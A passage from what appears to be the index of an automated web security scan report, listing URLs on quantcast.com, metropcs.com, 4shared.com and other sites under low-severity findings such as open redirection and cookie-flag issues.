9.288. http://www.quantcast.com/top-sites/SL

9.289. http://www.quantcast.com/top-sites/SM

9.290. http://www.quantcast.com/top-sites/SN

9.291. http://www.quantcast.com/top-sites/SO

9.292. http://www.quantcast.com/top-sites/SR

9.293. http://www.quantcast.com/top-sites/ST

9.294. http://www.quantcast.com/top-sites/SV

9.295. http://www.quantcast.com/top-sites/SY

9.296. http://www.quantcast.com/top-sites/SZ

9.297. http://www.quantcast.com/top-sites/TC

9.298. http://www.quantcast.com/top-sites/TD

9.299. http://www.quantcast.com/top-sites/TF

9.300. http://www.quantcast.com/top-sites/TG

9.301. http://www.quantcast.com/top-sites/TH

9.302. http://www.quantcast.com/top-sites/TJ

9.303. http://www.quantcast.com/top-sites/TK

9.304. http://www.quantcast.com/top-sites/TL

9.305. http://www.quantcast.com/top-sites/TM

9.306. http://www.quantcast.com/top-sites/TN

9.307. http://www.quantcast.com/top-sites/TO

9.308. http://www.quantcast.com/top-sites/TR

9.309. http://www.quantcast.com/top-sites/TT

9.310. http://www.quantcast.com/top-sites/TV

9.311. http://www.quantcast.com/top-sites/TW

9.312. http://www.quantcast.com/top-sites/TZ

9.313. http://www.quantcast.com/top-sites/UA

9.314. http://www.quantcast.com/top-sites/UG

9.315. http://www.quantcast.com/top-sites/UM

9.316. http://www.quantcast.com/top-sites/US

9.317. http://www.quantcast.com/top-sites/US/2

9.318. http://www.quantcast.com/top-sites/UY

9.319. http://www.quantcast.com/top-sites/UZ

9.320. http://www.quantcast.com/top-sites/VA

9.321. http://www.quantcast.com/top-sites/VC

9.322. http://www.quantcast.com/top-sites/VE

9.323. http://www.quantcast.com/top-sites/VG

9.324. http://www.quantcast.com/top-sites/VI

9.325. http://www.quantcast.com/top-sites/VN

9.326. http://www.quantcast.com/top-sites/VU

9.327. http://www.quantcast.com/top-sites/WF

9.328. http://www.quantcast.com/top-sites/WS

9.329. http://www.quantcast.com/top-sites/YE

9.330. http://www.quantcast.com/top-sites/YT

9.331. http://www.quantcast.com/top-sites/ZA

9.332. http://www.quantcast.com/top-sites/ZM

9.333. http://www.quantcast.com/top-sites/ZW

9.334. http://www.quantcast.com/tumblr.com

9.335. http://www.quantcast.com/twitpic.com

9.336. http://www.quantcast.com/twitter.com

9.337. http://www.quantcast.com/ups.com

9.338. http://www.quantcast.com/usps.com

9.339. http://www.quantcast.com/walmart.com

9.340. http://www.quantcast.com/washingtonpost.com

9.341. http://www.quantcast.com/weather.com

9.342. http://www.quantcast.com/weatherbug.com

9.343. http://www.quantcast.com/webmd.com

9.344. http://www.quantcast.com/wellsfargo.com

9.345. http://www.quantcast.com/whitepages.com

9.346. http://www.quantcast.com/wikia.com

9.347. http://www.quantcast.com/wikipedia.org

9.348. http://www.quantcast.com/windows.com

9.349. http://www.quantcast.com/wisegeek.com

9.350. http://www.quantcast.com/wordpress.com

9.351. http://www.quantcast.com/wunderground.com

9.352. http://www.quantcast.com/yahoo.com

9.353. http://www.quantcast.com/yellowpages.com

9.354. http://www.quantcast.com/yelp.com

9.355. http://www.quantcast.com/youtube.com

9.356. http://www.reputation.com/min/

9.357. http://www.sourceconference.com/blog/

10. SSL certificate

10.1. https://www.regonline.com/

10.2. https://www.metropcs.com/

10.3. https://www.coach.com/

10.4. https://www.reputation.com/

10.5. https://www.viglink.com/

11. Silverlight cross-domain policy

11.1. http://www.bing.com/clientaccesspolicy.xml

11.2. http://www.microsoft.com/clientaccesspolicy.xml

12. Password field submitted using GET method

13. Open redirection

13.1. http://www30a2.glam.com/gad/click.act [0395-_urlenc%3D1-_gclickid%3Dgaclk4daf8795a5218-_advid%3D1394104-_adid%3D5000036707-_crid%3D500025973-_aipid%3D201104201815-_ge_%3D1%5E2%5Ef092e03a6a6f7233fddea1dba6682b68-ord%3D7517821204382926-afid%3D640610-dsid%3D640610-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D3-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006301d1zl1q1g06k9%2Cf0f12sa%2Cg10001s-_gclick_gaclk4daf8795a5218 parameter]

13.2. http://www30a2.glam.com/gad/click.act [0395-_urlenc%3D1-_gclickid%3Dgaclk4daf87a1d3f17-_advid%3D1394104-_adid%3D5000036707-_crid%3D500025973-_aipid%3D201104201815-_ge_%3D1%5E2%5Ed11447cd4f98bcabf1c42fff04582408-ord%3D8175912909209728-afid%3D526139-dsid%3D526139-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db00624ved011q1g0k4i%2Cf0f12sa%2Cg10001s-_gclick_gaclk4daf87a1d3f17 parameter]

13.3. http://www30a2.glam.com/gad/click.act [0396-_urlenc%3D1-_gclickid%3Dgaclk4daf878acfac9-_advid%3D50002316-_adid%3D5000038225-_crid%3D500027662-_aipid%3D201104201815-_ge_%3D1%5E2%5E4d0b2a340212dd6ac8de952f71f0f533-ord%3D8514925059862435-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006215kwup1q1fzsk9%2Cf0f12sa%2Cg10001s-_gclick_gaclk4daf878acfac9 parameter]

13.4. http://www30a2.glam.com/gad/click.act [0396-_urlenc%3D1-_gclickid%3Dgaclk4daf8797ad1bb-_advid%3D1394104-_adid%3D5000036707-_crid%3D500025973-_aipid%3D201104201815-_ge_%3D1%5E2%5E6c1afbb3fa1783526cdf7625a14a9edf-ord%3D586278107948601.2-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006215kwup1q1g0ab9%2Cf0f12sa%2Cg10001s-_gclick_gaclk4daf8797ad1bb parameter]

13.5. http://www.awin1.com/cread.php [Referer HTTP header]

13.6. http://www.bing.com/challenge [query parameter]

14. Cookie scoped to parent domain

14.1. http://www.4shared.com/advertise/banners/desktop/300x250.jsp

14.2. http://www.4shared.com/images/blueBanner_plus.gif

14.3. http://www.4shared.com/images/index-premium-features.png

14.4. http://www.4shared.com/images/spacer.gif

14.5. http://www.admob.com/

14.6. http://www.barracudaware.com/

14.7. http://www.cudaeye.com/

14.8. https://www.infosecisland.com/blogview/11402-Cross-Site-Scripting-XSS-Some-Examples.html+xss/x26amp

14.9. https://www.infosecisland.com/blogview/12822-Spear-Phishing-Season-Is-Declared-Open.html

14.10. http://www.jcpenney.com/jcp/banners.asp

14.11. http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc

14.12. http://www.manta.com/cs/mtl07lp/industrial-waste-recovery-llc

14.13. http://www.manta.com/mb_34_E33B9_000/refuse_systems

14.14. http://www.manta.com/member/register/

14.15. http://www.manta.com/profile/my-companies/select

14.16. http://www.opensource.org/licenses/gpl-license.php

14.17. http://www.opensource.org/licenses/mit-license.php

14.18. http://www.stumbleupon.com/submit

14.19. http://www.tomcatexpert.com/blog/x26amp

14.20. http://www.tomcatexpert.com/blogs/mthomas/x26amp

14.21. http://www4.jcpenney.com/jcp/freeship4u.aspx

14.22. http://www5.jcpenney.com/jcp/

14.23. http://www5.jcpenney.com/jcp/AddToBag.aspx

14.24. http://www5.jcpenney.com/jcp/bag.aspx

14.25. http://www5.jcpenney.com/jcp/bagaction.aspx

14.26. http://www.4shared.com/premium.jsp

14.27. http://www.4shared.com/signUpBox.jsp

14.28. http://www.4shared.com/signup.jsp

14.29. http://www.akamai.com/

14.30. http://www.bing.com/

14.31. http://www.bing.com/challenge

14.32. http://www.bing.com/local/details.aspx

14.33. http://www.bizographics.com/collect/

14.34. http://www.cisco.com/

14.35. http://www.cisco.com/en/US/docs/security/nac/guestserver/release_notes/20/gsrn20.html

14.36. http://www.cisco.com/en/US/prod/collateral/vpndevc/ps5707/ps8418/ps6128/product_data_sheet0900aecd806e98c9.html

14.37. http://www.cisco.com/en/US/products/products_security_advisory09186a0080b74114.shtml

14.38. https://www.demandstudios.com/application.html

14.39. https://www.demandstudios.com/verify.aspx

14.40. http://www.facebook.com/2008/fbml

14.41. http://www.facebook.com/BLane77

14.42. http://www.facebook.com/DOUCHE01

14.43. http://www.facebook.com/ESPNNewYork

14.44. http://www.facebook.com/JohnFerrell

14.45. http://www.facebook.com/KOMONews

14.46. http://www.facebook.com/SaMmFalK

14.47. http://www.facebook.com/angie.eronson

14.48. http://www.facebook.com/campaign/impression.php

14.49. http://www.facebook.com/campaign/landing.php

14.50. http://www.facebook.com/cdulitz

14.51. http://www.facebook.com/chester.mitre

14.52. http://www.facebook.com/chris.paulette

14.53. http://www.facebook.com/daryl.shelby

14.54. http://www.facebook.com/deejayeric908

14.55. http://www.facebook.com/deekron

14.56. http://www.facebook.com/haydn.long

14.57. http://www.facebook.com/highrock.singers

14.58. http://www.facebook.com/jill.hightower1

14.59. http://www.facebook.com/khristhianssenj

14.60. http://www.facebook.com/pages/ESPNNewYorkcom/109006945794439

14.61. http://www.facebook.com/pages/Glamcom/144180538945796

14.62. http://www.facebook.com/pages/Paul-Deanno-KOMO/164817400226610

14.63. http://www.facebook.com/pages/Shannon-ODonnell-KOMO/174655965888526

14.64. http://www.facebook.com/pages/Steve-Pool-KOMO/115354065200981

14.65. http://www.facebook.com/pages/Theron-Zahn-KOMO/180364211988503

14.66. http://www.facebook.com/pauldeannokomo

14.67. http://www.facebook.com/profile.php

14.68. http://www.facebook.com/raymond.cree

14.69. http://www.facebook.com/scottskomo

14.70. http://www.facebook.com/sharer.php

14.71. http://www.facebook.com/stevepoolkomo

14.72. http://www.facebook.com/tracey.westerlund

14.73. http://www.facebook.com/viglink

14.74. https://www.facebook.com/ESPNNewYork

14.75. http://www.google.com/

14.76. http://www.google.com/aclk

14.77. http://www.google.com/advanced_search

14.78. http://www.google.com/bookmarks/mark

14.79. http://www.google.com/cse/home

14.80. http://www.google.com/finance

14.81. http://www.google.com/gen_204

14.82. http://www.google.com/history/optout

14.83. http://www.google.com/images

14.84. http://www.google.com/imghp

14.85. http://www.google.com/language_tools

14.86. http://www.google.com/mbd

14.87. http://www.google.com/prdhp

14.88. http://www.google.com/preferences

14.89. http://www.google.com/quality_form

14.90. http://www.google.com/realtime

14.91. http://www.google.com/search

14.92. http://www.google.com/webhp

14.93. http://www.linkedin.com/groups

14.94. http://www.mandiant.com/

14.95. http://www.meetup.com/AffiliateSummit/San-Francisco-CA/81593/

14.96. http://www.meetup.com/San-Francisco-Blog-Club/

14.97. http://www.metropcs.com/

14.98. http://www.metropcs.com/ScriptResource.axd

14.99. http://www.metropcs.com/WebResource.axd

14.100. http://www.metropcs.com/assets/handlers/BannerHandler.ashx

14.101. http://www.metropcs.com/assets/images/chrisbrown_home.jpg

14.102. http://www.metropcs.com/assets/images/icon_myMetroMail.png

14.103. http://www.metropcs.com/assets/images/icon_vcpay.png

14.104. http://www.metropcs.com/assets/images/privacy/truste_seal_web.gif

14.105. http://www.metropcs.com/assets/js/masterscript.js

14.106. http://www.metropcs.com/assets/js/transmotionlink.js

14.107. http://www.metropcs.com/assets/v3/flash/homepage/phonerotator.swf

14.108. http://www.metropcs.com/assets/v3/images/bg_body.jpg

14.109. http://www.metropcs.com/assets/v3/images/footer/facebook.png

14.110. http://www.metropcs.com/assets/v3/images/footer/twitter.png

14.111. http://www.metropcs.com/assets/v3/images/footer/youtube.png

14.112. http://www.metropcs.com/assets/v3/images/icon_email_small.gif

14.113. http://www.metropcs.com/assets/v3/js/core/jquery.maskedinput-1.2.2.min.js

14.114. http://www.metropcs.com/assets/v3/js/core/jquery.mixform.js

14.115. http://www.metropcs.com/assets/v3/js/core/jquery.scrollcontrol.js

14.116. http://www.metropcs.com/assets/v3/js/core/jquery.throbber.min.js

14.117. http://www.metropcs.com/assets/v3/js/core/window_pop.js

14.118. http://www.metropcs.com/assets/v3/js/global.js

14.119. http://www.metropcs.com/assets/v3/js/mods/facebox.js

14.120. http://www.metropcs.com/assets/v3/js/mods/jquery-1.3.2.min.js

14.121. http://www.metropcs.com/assets/v3/js/mods/jquery.qtip.min.js

14.122. http://www.metropcs.com/assets/v3/js/mods/pngfix.js

14.123. http://www.metropcs.com/assets/v3/js/mods/prettyCheckboxes.js

14.124. http://www.metropcs.com/assets/v3/js/mods/prettyComments.js

14.125. http://www.metropcs.com/assets/v3/js/mods/prettyValidation.js

14.126. http://www.metropcs.com/assets/v3/js/mods/suckerfish.js

14.127. http://www.metropcs.com/assets/v3/js/mods/swfobject.js

14.128. http://www.metropcs.com/assets/v3/styles/default.css

14.129. http://www.metropcs.com/assets/v3/styles/page_level/StoreLocator.css

14.130. http://www.metropcs.com/assets/v3/styles/page_level/home.css

14.131. http://www.metropcs.com/foresee/foresee-trigger.js

14.132. https://www.metropcs.com/assets/images/icon_vcpay.png

14.133. https://www.metropcs.com/assets/v3/images/footer/facebook.png

14.134. https://www.metropcs.com/assets/v3/images/footer/twitter.png

14.135. https://www.metropcs.com/assets/v3/images/footer/youtube.png

14.136. http://www.newsvine.com/_wine/save

14.137. http://www.southparkstudios.com/account/login

14.138. http://www.yellowbook.com/profile/industrial-waste-services_1599831554.html

14.139. http://www.yellowbook.com/yellow-pages/

14.140. http://www.yelp.com/search

14.141. http://www.youtube.com/

14.142. http://www.youtube.com/results

14.143. http://www.youtube.com/user/4sharedTEAM

14.144. http://www.youtube.com/watch

14.145. http://www22.verizon.com/privacy/

14.146. http://www4.jcpenney.com/jcp/JCPRoute.aspx

14.147. http://www5.jcpenney.com/jcp/X6E.aspx

14.148. http://xads.zedo.com/ads2/c%3Fa%3D895737%3Bx%3D2304%3Bg%3D172%3Bc%3D305005852%2C305005852%3Bi%3D0%3Bn%3D305%3Bi%3D0%3Bu%3DjhmxpQoBADYAAET@BzgAAAAW%7E022111%3B1%3D8%3B2%3D1%3Be%3Di%3Bs%3D421%3Bg%3D172%3Bw%3D47%3Bm%3D82%3Bz%3D0.2778043581638485%3Bp%3D8%3Bf%3D1093076%3Bh%3D1093075%3Bo%3D20%3By%3D331%3Bv%3D1%3Bt%3Di%3Bk=&udj=uf('a',%20577,%201298497076)

14.149. http://xads.zedo.com/ads3/a

15. Cookie without HttpOnly flag set

15.1. http://www.4shared.com/

15.2. http://www.4shared.com/advertise/

15.3. http://www.4shared.com/advertise/banners/desktop/300x250.jsp

15.4. http://www.4shared.com/advertise/banners/desktop/728x90.jsp

15.5. http://www.4shared.com/contact.jsp

15.6. http://www.4shared.com/desktop/

15.7. http://www.4shared.com/enter.jsp

15.8. http://www.4shared.com/faq.jsp

15.9. http://www.4shared.com/icons/16x16/

15.10. http://www.4shared.com/images/blueBanner_plus.gif

15.11. http://www.4shared.com/images/index-premium-features.png

15.12. http://www.4shared.com/images/spacer.gif

15.13. http://www.4shared.com/index.jsp

15.14. http://www.4shared.com/js/loginScript.jsp

15.15. http://www.4shared.com/js/signup-script.jsp

15.16. http://www.4shared.com/loginBox.jsp

15.17. http://www.4shared.com/m/android.jsp

15.18. http://www.4shared.com/m/blackberry.jsp

15.19. http://www.4shared.com/m/symbian.jsp

15.20. http://www.4shared.com/main/translate/setLang.jsp

15.21. http://www.4shared.com/oauth/startFacebookLogin.jsp

15.22. http://www.4shared.com/premium.jsp

15.23. http://www.4shared.com/press_room/

15.24. http://www.4shared.com/privacy.jsp

15.25. http://www.4shared.com/remindPassword.jsp

15.26. http://www.4shared.com/resellers.jsp

15.27. http://www.4shared.com/signUpBox.jsp

15.28. http://www.4shared.com/signup.jsp

15.29. http://www.4shared.com/terms.jsp

15.30. http://www.4shared.com/toolbar/

15.31. http://www.admob.com/

15.32. http://www.b3b.ch/2011/03/27/rien-ne-va-plus-dans-la-securite-linfoguerre-est-declaree/

15.33. http://www.barracudanetworks.com/ns/purchase/

15.34. http://www.barracudaware.com/

15.35. http://www.bizfind.us/

15.36. http://www.bizfind.us/CAPTCHA/CAPTCHA_image.asp

15.37. http://www.bizfind.us/CAPTCHA/CAPTCHA_image.asp

15.38. http://www.bizfind.us/cat/39/1/34183/philadelphia.aspx

15.39. http://www.bluefountainmedia.com/

15.40. http://www.cmswire.com/events/item/source-boston-006828.php

15.41. http://www.coach.com/online/handbags/-poppy_bags-10551-10051-5000000000000189652-en

15.42. http://www.coach.com/online/handbags/COABannerCodeDirectorCmd

15.43. http://www.coach.com/online/handbags/ContactUsView

15.44. http://www.coach.com/online/handbags/MensLandingView

15.45. http://www.coach.com/online/handbags/OrderStatusView

15.46. http://www.coach.com/online/handbags/PopUnderView

15.47. http://www.coach.com/online/handbags/ShoppingCartView

15.48. http://www.coach.com/online/handbags/SiteMapView

15.49. http://www.coach.com/online/handbags/StoreLocatorView

15.50. http://www.coach.com/online/handbags/UserRegistrationGetView

15.51. http://www.coach.com/online/handbags/clickatcoach-10551-10051-en-SMCO0002

15.52. https://www.coach.com/online/handbags/PopUnderView

15.53. http://www.commercialdumpster.com/

15.54. http://www.comodo.com/business-security/digital-certificates/ssl-certificates.php

15.55. http://www.contextweb.com/

15.56. http://www.cudaeye.com/

15.57. http://www.dyn-web.com/

15.58. http://www.emailmeform.com/builder/captcha/index/b1b2823bec060bcaee221750e259c212

15.59. http://www.espn.com.au/

15.60. http://www.espnshop.com/family/index.jsp

15.61. http://www.fismacenter.com/

15.62. http://www.gfi.com/

15.63. http://www.glam.com/

15.64. http://www.infosecleaders.com/

15.65. http://www.insideup.com/captcha.html

15.66. http://www.insideup.com/login.html

15.67. http://www.insideup.com/ppc/leadflow/style/blackdot.gif

15.68. http://www.instantssl.it/

15.69. http://www.issa.org/

15.70. http://www.jcpenney.com/jcp/banners.asp

15.71. http://www.jcpstoreads.com/jcpenney/

15.72. http://www.jcpstoreads.com/jcpenney/default.aspx

15.73. http://www.kiala.fr/

15.74. http://www.komo4rewards.com/index.htm

15.75. http://www.linkedin.com/groups

15.76. http://www.macraesbluebook.com/search/company.cfm

15.77. http://www.macraesbluebook.com/search/product_company_list.cfm

15.78. http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc

15.79. http://www.manta.com/cs/mtl07lp/industrial-waste-recovery-llc

15.80. http://www.manta.com/mb_34_E33B9_000/refuse_systems

15.81. http://www.manta.com/member/register/

15.82. http://www.manta.com/profile/my-companies/select

15.83. http://www.navcen.uscg.gov/

15.84. http://www.ncircle.com/

15.85. http://www.opensource.org/licenses/gpl-license.php

15.86. http://www.opensource.org/licenses/mit-license.php

15.87. http://www.outsourcermarketplace.com/faq.php

15.88. http://www.packetmotion.com/

15.89. http://www.paper-source.com/cgi-bin/paper/locations/ma_boston.html

15.90. http://www.poisonivy-rat.com/

15.91. http://www.quantcast.com/4shared.com

15.92. http://www.quantcast.com/about.com

15.93. http://www.quantcast.com/accuweather.com

15.94. http://www.quantcast.com/ad4game.com

15.95. http://www.quantcast.com/adobe.com

15.96. http://www.quantcast.com/allrecipes.com

15.97. http://www.quantcast.com/amazon.com

15.98. http://www.quantcast.com/ancestry.com

15.99. http://www.quantcast.com/angelfire.com

15.100. http://www.quantcast.com/answerbag.com

15.101. http://www.quantcast.com/answers.com

15.102. http://www.quantcast.com/aol.com

15.103. http://www.quantcast.com/apple.com

15.104. http://www.quantcast.com/articlesbase.com

15.105. http://www.quantcast.com/ask.com

15.106. http://www.quantcast.com/askmen.com

15.107. http://www.quantcast.com/associatedcontent.com

15.108. http://www.quantcast.com/att.com

15.109. http://www.quantcast.com/autotrader.com

15.110. http://www.quantcast.com/babycenter.com

15.111. http://www.quantcast.com/bankofamerica.com

15.112. http://www.quantcast.com/barnesandnoble.com

15.113. http://www.quantcast.com/bbc.co.uk

15.114. http://www.quantcast.com/bestbuy.com

15.115. http://www.quantcast.com/bing.com

15.116. http://www.quantcast.com/bizrate.com

15.117. http://www.quantcast.com/bleacherreport.com

15.118. http://www.quantcast.com/blogger.com

15.119. http://www.quantcast.com/blogspot.com

15.120. http://www.quantcast.com/blurtit.com

15.121. http://www.quantcast.com/borders.com

15.122. http://www.quantcast.com/boreme.com

15.123. http://www.quantcast.com/break.com

15.124. http://www.quantcast.com/brothersoft.com

15.125. http://www.quantcast.com/buycheapr.com

15.126. http://www.quantcast.com/ca.gov

15.127. http://www.quantcast.com/candystand.com

15.128. http://www.quantcast.com/capitalone.com

15.129. http://www.quantcast.com/careerbuilder.com

15.130. http://www.quantcast.com/causes.com

15.131. http://www.quantcast.com/cbsnews.com

15.132. http://www.quantcast.com/cbssports.com

15.133. http://www.quantcast.com/chacha.com

15.134. http://www.quantcast.com/chase.com

15.135. http://www.quantcast.com/city-data.com

15.136. http://www.quantcast.com/cnbc.com

15.137. http://www.quantcast.com/cnet.com

15.138. http://www.quantcast.com/cnn.com

15.139. http://www.quantcast.com/comcast.com

15.140. http://www.quantcast.com/comcast.net

15.141. http://www.quantcast.com/coolmath-games.com

15.142. http://www.quantcast.com/craigslist.org

15.143. http://www.quantcast.com/dailymotion.com

15.144. http://www.quantcast.com/dell.com

15.145. http://www.quantcast.com/deviantart.com

15.146. http://www.quantcast.com/digg.com

15.147. http://www.quantcast.com/directv.com

15.148. http://www.quantcast.com/docstoc.com

15.149. http://www.quantcast.com/drudgereport.com

15.150. http://www.quantcast.com/drugs.com

15.151. http://www.quantcast.com/ebay.com

15.152. http://www.quantcast.com/edmunds.com

15.153. http://www.quantcast.com/ehow.com

15.154. http://www.quantcast.com/etsy.com

15.155. http://www.quantcast.com/evite.com

15.156. http://www.quantcast.com/ew.com

15.157. http://www.quantcast.com/examiner.com

15.158. http://www.quantcast.com/expedia.com

15.159. http://www.quantcast.com/ezinearticles.com

15.160. http://www.quantcast.com/facebook.com

15.161. http://www.quantcast.com/fedex.com

15.162. http://www.quantcast.com/filestube.com

15.163. http://www.quantcast.com/filmannex.com

15.164. http://www.quantcast.com/fixya.com

15.165. http://www.quantcast.com/flickr.com

15.166. http://www.quantcast.com/foodnetwork.com

15.167. http://www.quantcast.com/formspring.me

15.168. http://www.quantcast.com/foxnews.com

15.169. http://www.quantcast.com/gawker.com

15.170. http://www.quantcast.com/global/personalHeader

15.171. http://www.quantcast.com/go.com

15.172. http://www.quantcast.com/godaddy.com

15.173. http://www.quantcast.com/google.com

15.174. http://www.quantcast.com/grindtv.com

15.175. http://www.quantcast.com/healthgrades.com

15.176. http://www.quantcast.com/homedepot.com

15.177. http://www.quantcast.com/howstuffworks.com

15.178. http://www.quantcast.com/hp.com

15.179. http://www.quantcast.com/hubpages.com

15.180. http://www.quantcast.com/huffingtonpost.com

15.181. http://www.quantcast.com/hulu.com

15.182. http://www.quantcast.com/ign.com

15.183. http://www.quantcast.com/imdb.com

15.184. http://www.quantcast.com/indeed.com

15.185. http://www.quantcast.com/intuit.com

15.186. http://www.quantcast.com/irs.gov

15.187. http://www.quantcast.com/jcpenney.com

15.188. http://www.quantcast.com/justanswer.com

15.189. http://www.quantcast.com/kohls.com

15.190. http://www.quantcast.com/komonews.com

15.191. http://www.quantcast.com/legacy.com

15.192. http://www.quantcast.com/linkedin.com

15.193. http://www.quantcast.com/live.com

15.194. http://www.quantcast.com/local.com

15.195. http://www.quantcast.com/localpages.com

15.196. http://www.quantcast.com/lowes.com

15.197. http://www.quantcast.com/manta.com

15.198. http://www.quantcast.com/mapquest.com

15.199. http://www.quantcast.com/match.com

15.200. http://www.quantcast.com/mayoclinic.com

15.201. http://www.quantcast.com/medicinenet.com

15.202. http://www.quantcast.com/merchantcircle.com

15.203. http://www.quantcast.com/merriam-webster.com

15.204. http://www.quantcast.com/metacafe.com

15.205. http://www.quantcast.com/microsoft.com

15.206. http://www.quantcast.com/miniclip.com

15.207. http://www.quantcast.com/monster.com

15.208. http://www.quantcast.com/moviefone.com

15.209. http://www.quantcast.com/msn.com

15.210. http://www.quantcast.com/mtv.com

15.211. http://www.quantcast.com/myspace.com

15.212. http://www.quantcast.com/nbc.com

15.213. http://www.quantcast.com/netflix.com

15.214. http://www.quantcast.com/nfl.com

15.215. http://www.quantcast.com/nih.gov

15.216. http://www.quantcast.com/noaa.gov

15.217. http://www.quantcast.com/norton.com

15.218. http://www.quantcast.com/nydailynews.com

15.219. http://www.quantcast.com/nytimes.com

15.220. http://www.quantcast.com/overstock.com

15.221. http://www.quantcast.com/pandora.com

15.222. http://www.quantcast.com/paypal.com

15.223. http://www.quantcast.com/people.com

15.224. http://www.quantcast.com/photobucket.com

15.225. http://www.quantcast.com/planner

15.226. http://www.quantcast.com/pogo.com

15.227. http://www.quantcast.com/profile-index

15.228. http://www.quantcast.com/profile/performance

15.229. http://www.quantcast.com/pronto.com

15.230. http://www.quantcast.com/reddit.com

15.231. http://www.quantcast.com/reference.com

15.232. http://www.quantcast.com/righthealth.com

15.233. http://www.quantcast.com/rockyou.com

15.234. http://www.quantcast.com/rr.com

15.235. http://www.quantcast.com/scribd.com

15.236. http://www.quantcast.com/searchassist.com

15.237. http://www.quantcast.com/sears.com

15.238. http://www.quantcast.com/shopathome.com

15.239. http://www.quantcast.com/shoplocal.com

15.240. http://www.quantcast.com/shopping.com

15.241. http://www.quantcast.com/shopzilla.com

15.242. http://www.quantcast.com/simplyhired.com

15.243. http://www.quantcast.com/smileycentral.com

15.244. http://www.quantcast.com/softonic.com

15.245. http://www.quantcast.com/spokeo.com

15.246. http://www.quantcast.com/squidoo.com

15.247. http://www.quantcast.com/staples.com

15.248. http://www.quantcast.com/suite101.com

15.249. http://www.quantcast.com/superpages.com

15.250. http://www.quantcast.com/target.com

15.251. http://www.quantcast.com/thefind.com

15.252. http://www.quantcast.com/thesaurus.com

15.253. http://www.quantcast.com/time.com

15.254. http://www.quantcast.com/tmz.com

15.255. http://www.quantcast.com/top-sites

15.256. http://www.quantcast.com/top-sites-1

15.257. http://www.quantcast.com/top-sites/AD

15.258. http://www.quantcast.com/top-sites/AE

15.259. http://www.quantcast.com/top-sites/AF

15.260. http://www.quantcast.com/top-sites/AG

15.261. http://www.quantcast.com/top-sites/AI

15.262. http://www.quantcast.com/top-sites/AL

15.263. http://www.quantcast.com/top-sites/AM

15.264. http://www.quantcast.com/top-sites/AN

15.265. http://www.quantcast.com/top-sites/AO

15.266. http://www.quantcast.com/top-sites/AQ

15.267. http://www.quantcast.com/top-sites/AR

15.268. http://www.quantcast.com/top-sites/AS

15.269. http://www.quantcast.com/top-sites/AT

15.270. http://www.quantcast.com/top-sites/AU

15.271. http://www.quantcast.com/top-sites/AW

15.272. http://www.quantcast.com/top-sites/AX

15.273. http://www.quantcast.com/top-sites/AZ

15.274. http://www.quantcast.com/top-sites/BA

15.275. http://www.quantcast.com/top-sites/BB

15.276. http://www.quantcast.com/top-sites/BD

15.277. http://www.quantcast.com/top-sites/BE

15.278. http://www.quantcast.com/top-sites/BF

15.279. http://www.quantcast.com/top-sites/BG

15.280. http://www.quantcast.com/top-sites/BH

15.281. http://www.quantcast.com/top-sites/BI

15.282. http://www.quantcast.com/top-sites/BJ

15.283. http://www.quantcast.com/top-sites/BM

15.284. http://www.quantcast.com/top-sites/BN

15.285. http://www.quantcast.com/top-sites/BO

15.286. http://www.quantcast.com/top-sites/BR

15.287. http://www.quantcast.com/top-sites/BS

15.288. http://www.quantcast.com/top-sites/BT

15.289. http://www.quantcast.com/top-sites/BV

15.290. http://www.quantcast.com/top-sites/BW

15.291. http://www.quantcast.com/top-sites/BY

15.292. http://www.quantcast.com/top-sites/BZ

15.293. http://www.quantcast.com/top-sites/CA

15.294. http://www.quantcast.com/top-sites/CC

15.295. http://www.quantcast.com/top-sites/CD

15.296. http://www.quantcast.com/top-sites/CF

15.297. http://www.quantcast.com/top-sites/CG

15.298. http://www.quantcast.com/top-sites/CH

15.299. http://www.quantcast.com/top-sites/CI

15.300. http://www.quantcast.com/top-sites/CK

15.301. http://www.quantcast.com/top-sites/CL

15.302. http://www.quantcast.com/top-sites/CM

15.303. http://www.quantcast.com/top-sites/CN

15.304. http://www.quantcast.com/top-sites/CO

15.305. http://www.quantcast.com/top-sites/CR

15.306. http://www.quantcast.com/top-sites/CU

15.307. http://www.quantcast.com/top-sites/CV

15.308. http://www.quantcast.com/top-sites/CX

15.309. http://www.quantcast.com/top-sites/CY

15.310. http://www.quantcast.com/top-sites/CZ

15.311. http://www.quantcast.com/top-sites/DE

15.312. http://www.quantcast.com/top-sites/DJ

15.313. http://www.quantcast.com/top-sites/DK

15.314. http://www.quantcast.com/top-sites/DM

15.315. http://www.quantcast.com/top-sites/DO

15.316. http://www.quantcast.com/top-sites/DZ

15.317. http://www.quantcast.com/top-sites/EC

15.318. http://www.quantcast.com/top-sites/EE

15.319. http://www.quantcast.com/top-sites/EG

15.320. http://www.quantcast.com/top-sites/EH

15.321. http://www.quantcast.com/top-sites/ER

15.322. http://www.quantcast.com/top-sites/ES

15.323. http://www.quantcast.com/top-sites/ET

15.324. http://www.quantcast.com/top-sites/FI

15.325. http://www.quantcast.com/top-sites/FJ

15.326. http://www.quantcast.com/top-sites/FK

15.327. http://www.quantcast.com/top-sites/FM

15.328. http://www.quantcast.com/top-sites/FO

15.329. http://www.quantcast.com/top-sites/FR

15.330. http://www.quantcast.com/top-sites/GA

15.331. http://www.quantcast.com/top-sites/GB

15.332. http://www.quantcast.com/top-sites/GD

15.333. http://www.quantcast.com/top-sites/GE

15.334. http://www.quantcast.com/top-sites/GF

15.335. http://www.quantcast.com/top-sites/GG

15.336. http://www.quantcast.com/top-sites/GH

15.337. http://www.quantcast.com/top-sites/GI

15.338. http://www.quantcast.com/top-sites/GL

15.339. http://www.quantcast.com/top-sites/GM

15.340. http://www.quantcast.com/top-sites/GN

15.341. http://www.quantcast.com/top-sites/GP

15.342. http://www.quantcast.com/top-sites/GQ

15.343. http://www.quantcast.com/top-sites/GR

15.344. http://www.quantcast.com/top-sites/GS
